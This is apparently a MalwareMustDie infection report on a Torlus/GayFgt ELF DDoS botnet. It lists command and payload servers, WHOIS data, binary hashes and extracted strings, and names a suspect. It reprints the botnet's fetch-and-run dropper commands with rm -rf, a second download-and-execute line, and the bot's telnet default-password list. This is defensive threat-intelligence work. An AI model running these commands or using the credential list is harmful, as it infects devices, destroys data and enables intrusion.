Malware ELF DDOS Botnet Torlus/GayFgt Infection Report

1.    _____         .__                                  _____                  __ _______  .__        
2.   /     \ _____  |  |__  _  _______ _______   ____   /     \  __ __  _______/  |\____ \ |__| ____  
3.  /  \ /  \\__  \ |  |\ \/ \/ /\__  \\_  __ \_/ __ \ /  \ /  \|  |  \/  ___/\   __\  |  \|  |/ __ \
4. /    Y    \/ __ \|  |_\     /  / __ \|  | \/\  ___//    Y    \  |  /\___ \  |  | |  `   \  \  ___/
5. \____|__  (____  /____/\/\_/  (____  /__|    \___  >____|__  /____//____  > |__|/__ __  /__|\___  >
6.         \/     \/                  \/            \/        \/           \/             \/        \/
7. #MalwareMustDie :: malwaremustdie.org
8.  
9. ###############################
10. # 0x01. Cyber crime Suspect
11. ###############################
12.  
13.   Handle: AntiChrist/Reverse/NoHacker/etc.. | Origin: Noord Netherlands
14.   Verdict: Hack routers for ELF malware backddor for DDOS attack & etc malicious purpose
15.            a Lizard Squad loonies, and administrator of lizard stresser service.
16.            PoC: https://pastebin.com/raw/nweQVfN6
17.   Profile:
18.   http://malwaremustdie.org/stat/antichrist.html
19.  
20. ###############################
21. # 0x02. Report details
22. ###############################
23.  
24.    New malware infrastructure in Moldova & Lithuania
25.    Malware variant: ELF Botnet Torlus/GayFgt/Lizard Kebab multi architecture.
26.    Malware / incident reference: MMD-0052-2016 - SkidDDOS ELF infection
27.    http://blog.malwaremustdie.org/2016/02/mmd-0052-2016-skidddos-elf-distribution.html
28.  
29. #### ELF INFECTION #######
30.  
31. // infection:
32. http://new.updatebits.su/get.sh （185.130.5.179）
33. // updates1:
34. http://new.updatebits.su/cfw.sh （185.130.5.179）
35. // updates2
36. cf.updatebits.su (208.67.1.66)
37.  
38. //CNC:
39. 176.123.7.70:168
40. hostname: 176-123-7-70.alexhost.md (176.123.7.70)
41. Connection to 176.123.7.70 168 port [tcp/＊] succeeded!
42.  
43. // domain:
44. domain:        UPDATEBITS.SU
45. nserver:       amy.ns.cloudflare.com.
46. nserver:       art.ns.cloudflare.com.
47. state:         REGISTERED, DELEGATED
48. person:        Private Person
49. e-mail:        zefknot@gmx.com
50. registrar:     R01-REG-FID
51. created:       2015.11.28
52. paid-till:     2016.11.28
53. free-date:     2016.12.31
54. source:        TCI
55.  
56. #### PAYLOAD SERVER #######
57.  
58. HTTP/1.1 200 OK
59. Date: Sat, 27 Feb 2016 13:28:25 GMT
60. Server: Apache/2.2.15 (CentOS)
61. Last-Modified: Fri, 26 Feb 2016 22:13:32 GMT
62. ETag: "14202b6-703-52cb39c0a08f2"
63. 200 OK
64.  
65. #### LOCATION ######
66.  
67. {
68.   "ip": "185.130.5.179",
69.   "hostname": "new.updatebits.su",
70.   "city": "",
71.   "region": "",
72.   "country": "LT",
73.   "loc": "56.0000,24.0000",
74.   "org": "AS60117 Host Sailor Ltd."
75.  
76.   "ip": "176.123.7.70",
77.   "hostname": "176-123-7-70.alexhost.md",
78.   "city": "Chisinau",
79.   "region": "Municipiul Chisinau",
80.   "country": "MD",
81.   "loc": "47.0056,28.8575",
82.   "org": "AS200019 ALEXHOST SRL"
83.  
84.   "ip": "208.67.1.66",
85.   "hostname": "cf.updatebits.su",
86.   "city": "Kansas City",
87.   "region": "Missouri",
88.   "country": "US",
89.   "loc": "39.1472,-94.5735",
90.   "org": "AS33387 DataShack, LC",
91.   "postal": "64116"
92. }
93.  
94. #### PAYLOADS #######
95.  
96. -------------------
97. ulimit -n 712
98. cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d11 || wget http://185.130.5.179/d11;cat d11 >busybox;chmod 777 busybox;./busybox
99. cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d8 || wget http://185.130.5.179/d8;cat d8 >busybox;chmod 777 busybox;./busybox
100. cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d7 || wget http://185.130.5.179/d7;cat d7 >busybox;chmod 777 busybox;./busybox
101. cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d1 || wget http://185.130.5.179/d1;cat d1 >busybox;chmod 777 busybox;./busybox
102. cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d2 || wget http://185.130.5.179/d2;cat d2 >busybox;chmod 777 busybox;./busybox
103. cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d3 || wget http://185.130.5.179/d3;cat d3 >busybox;chmod 777 busybox;./busybox
104. cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d4 || wget http://185.130.5.179/d4;cat d4 >busybox;chmod 777 busybox;./busybox
105. cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d5 || wget http://185.130.5.179/d5;cat d5 >busybox;chmod 777 busybox;./busybox
106. cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d6 || wget http://185.130.5.179/d6;cat d6 >busybox;chmod 777 busybox;./busybox
107. cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d9 || wget http://185.130.5.179/d9;cat d9 >busybox;chmod 777 busybox;./busybox
108. cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d10 || wget http://185.130.5.179/d10;cat d10 >busybox;chmod 777 busybox;./busybox
109. cd /tmp || cd /var/run;rm -rf *;busybox wget http://185.130.5.179/d12 || wget http://185.130.5.179/d12;cat d12 >busybox;chmod 777 busybox;./busybox
110. rm -rf /tmp/1＊
111. rm -rf /var/run/＊
112.  
113. #### BINS #######
114.  
115. --------------------
116. d1: ELF 32-bit LSB executable, ARM, version 1, statically linked, not stripped
117. d10:ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, not stripped
118. d11:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, not stripped
119. d12:ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, not stripped
120. d2: ELF 32-bit LSB executable, ARM, version 1, statically linked, not stripped
121. d3: ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, not stripped
122. d4: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, not stripped
123. d5: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, not stripped
124. d6: ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, not stripped
125. d7: ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, not stripped
126. d8: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, not stripped
127. d9: ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, not stripped
128.  
129. #### HASHES #######
130.  
131. --------------------
132. SHA1 (d1) = 7d23b5292db6f928da4e357194d83466ef177a31
133. SHA1 (d10) = 09e1fecc42b9d95a5b72209b8c44656aac15133e
134. SHA1 (d11) = 691f1848297cf2b79d8e7936fb57915243ff30a5
135. SHA1 (d12) = b09c71710132975ebc3d5ece042664f99f270238
136. SHA1 (d2) = 26eedb2f6d7a0794b4ed264f8185439421892c0a
137. SHA1 (d3) = 2b1511cd39a5f5540608713a617fe0496e8cbc18
138. SHA1 (d4) = 577ac74c5e28d73ab5738b1d039d2be6d9fab649
139. SHA1 (d5) = e6cbd349bed899005824f63e7232b70111c73b63
140. SHA1 (d6) = 047db9b9ea6e69511f7353e263518ed8c18a6168
141. SHA1 (d7) = 506b499efcd2436e7863de7ce6e6aa1f62537a71
142. SHA1 (d8) = 2c6863d79808801623bfd3bcce216c023004397d
143. SHA1 (d9) = 4249e6fd28ee2838759f1621f4c1bd79a4b1dec2
144.  
145. #### SNIPS #######
146.  
147. --------------------
148. .rodata:0x0805CD40  176.123.7.70:168
149. .rodata:0x0805CD51  root
150. .rodata:0x0805CD57  admin
151. .rodata:0x0805CD5E  user
152. .rodata:0x0805CD64  login
153. .rodata:0x0805CD6B  guest
154. .rodata:0x0805CD72  support
155. .rodata:0x0805CD7B  cisco
156. .rodata:0x0805CD82  toor
157. .rodata:0x0805CD88  changeme
158. .rodata:0x0805CD92  1234
159. .rodata:0x0805CD98  12345
160. .rodata:0x0805CD9F  123456
161. .rodata:0x0805CDA7  default
162. .rodata:0x0805CDB0  pass
163. .rodata:0x0805CDB6  password
164. .rodata:0x0805CDC0  vizxv
165. .rodata:0x0805CDC7  (null)
166. .rodata:0x0805CDCE  buf: %s\n
167. .rodata:0x0805CDD7  -c
168. .rodata:0x0805CDDA  sh
169. .rodata:0x0805CDDD  /bin/sh
170. .rodata:0x0805D200  /proc/cpuinfo
171. .rodata:0x0805D20E  BOGOMIPS
172. .rodata:0x0805D217  PING
173. .rodata:0x0805D21C  :>%$#
174. .rodata:0x0805D223  %d.%d.%d.%d
175. .rodata:0x0805D22F  %d.%d.%d.0
176. .rodata:0x0805D23A  ogin:
177. .rodata:0x0805D240  \r\n
178. .rodata:0x0805D243  assword:
179. .rodata:0x0805D24C  ncorrect
180. .rodata:0x0805D255  sh\r\n
181. .rodata:0x0805D25A  shell\r\n
182. .rodata:0x0805D264  cd /tmp || cd /var/run; rm -rf *; busybox wget http://new.updatebits.su/cfw.sh || wget http://new.updatebits.su/cfw.sh; sh cfw.sh; rm -rf cfw.sh; busybox tftp -r tft.sh -g cf.updatebits.su || tftp -r tft.sh -g cf.updatebits.su; sh tft.sh; rm -rf tft.sh\r\n
183. .rodata:0x0805D364  /bin/busybox;echo -e 'gayfgt'\r\n
184. .rodata:0x0805D384  ulti-call
185. .rodata:0x0805D38E  REPORT %s:%s:%s
186. .rodata:0x0805D39E  gayfgt
187. .rodata:0x0805D3D8  Failed opening raw socket.
188. .rodata:0x0805D3F4  Failed setting raw headers mode.
189. .rodata:0x0805D415  all
190. .rodata:0x0805D41B  syn
191. .rodata:0x0805D41F  rst
192. .rodata:0x0805D423  fin
193. .rodata:0x0805D427  ack
194. .rodata:0x0805D42B  psh
195. .rodata:0x0805D42F  Invalid flag \”%s\”
196. .rodata:0x0805D441  PONG!
197. .rodata:0x0805D447  GETLOCALIP
198. .rodata:0x0805D452  My IP: %s
199. .rodata:0x0805D45C  SCANNER
200. .rodata:0x0805D464  SCANNER ON | OFF
201. .rodata:0x0805D475  OFF
202. .rodata:0x0805D479  ON
203. .rodata:0x0805D47C  FORK
204. .rodata:0x0805D481  HOLD
205. .rodata:0x0805D486  JUNK
206. .rodata:0x0805D48B  UDP
207. .rodata:0x0805D48F  TCP
208. .rodata:0x0805D493  KILLATTK
209. .rodata:0x0805D49C  Killed %d.
210. .rodata:0x0805D4A7  None Killed.
211. .rodata:0x0805D4B4  LOLNOGTFO
212. .rodata:0x0805D4BE  8.8.8.8
213. .rodata:0x0805D4C6  /proc/net/route
214. .rodata:0x0805D4D6  \t00000000\t
215. .rodata:0x0805D4E1  [cpuset]
216. .rodata:0x0805D4EA  fork failed\n
217. .rodata:0x0805D4F9  FAILED TO CONNECT
218. .rodata:0x0805D50B  PONG
219. .rodata:0x0805D510  DUP
220. .rodata:0x0805D514  SH
221. .rodata:0x0805D517  %s 2>&1
222. .rodata:0x0805D523  LINK CLOSED
223. .rodata:0x0805D564  0.9.30
224. .rodata:0x0805DBC8  -c
225. .rodata:0x0805DBCB  /bin/sh
226. .rodata:0x0805DE2C  /dev/null
227. .rodata:0x0805DE74  clntudp_create: out of memory\n
228. .rodata:0x0805DEE0  bad auth_len gid %d str %d auth %d\n
229. .rodata:0x0805DF04  xdr_string: out of memory\n
230. .rodata:0x0805DF1F  xdr_bytes: out of memory\n
231. .rodata:0x0805DF68  (nil)
232. .rodata:0x0805DF6E  (null)
233. .rodata:0x0805DFC5  npxXoudifFeEgGaACScs
234. .rodata:0x0805EB90  __get_myaddress: socket
235. .rodata:0x0805EBA8  __get_myaddress: ioctl (get interface configuration)
236. .rodata:0x0805EBDD  __get_myaddress: ioctl
237. .rodata:0x0805EBF4  Cannot register service
238. .rodata:0x0805EC1C  xdr_array: out of memory\n
239. .rodata:0x0805EC38  /etc/resolv.conf
240. .rodata:0x0805EC49  /etc/config/resolv.conf
241. .rodata:0x0805EC61  nameserver
242. .rodata:0x0805EC6C  domain
243. .rodata:0x0805EC73  search
244. .rodata:0x0805EC7A  %s%s%m\n
245. .rodata:0x0805ED5C  RPC: (unknown error code)
246. .rodata:0x0805ED76  %s:
247. .rodata:0x0805ED7F  ; errno = %s
248. .rodata:0x0805ED8C  ; low version = %lu, high version = %lu
249. .rodata:0x0805EDB4  ; why =
250. .rodata:0x0805EDBD  (unknown authentication error - %d)
251. .rodata:0x0805EDE1  ; s1 = %lu, s2 = %lu
252. .rodata:0x0805F1D4  %x
253. .rodata:0x0805F1D7  0123456789abcdef
254. .rodata:0x0805F1E8  /etc/hosts
255. .rodata:0x0805F1F3  /etc/config/hosts
256.  
257. ###############################
258. # 0x03. Contact us for more information
259. ###############################
260.  
261. Twitter: @malwaremustdie (Direct Message)
262.          warning: your IP/location will be scanned & conversation is recorded
263.          Come clean & stay safe!
264.  
265. #MalwareMustDie!
266. [EOF]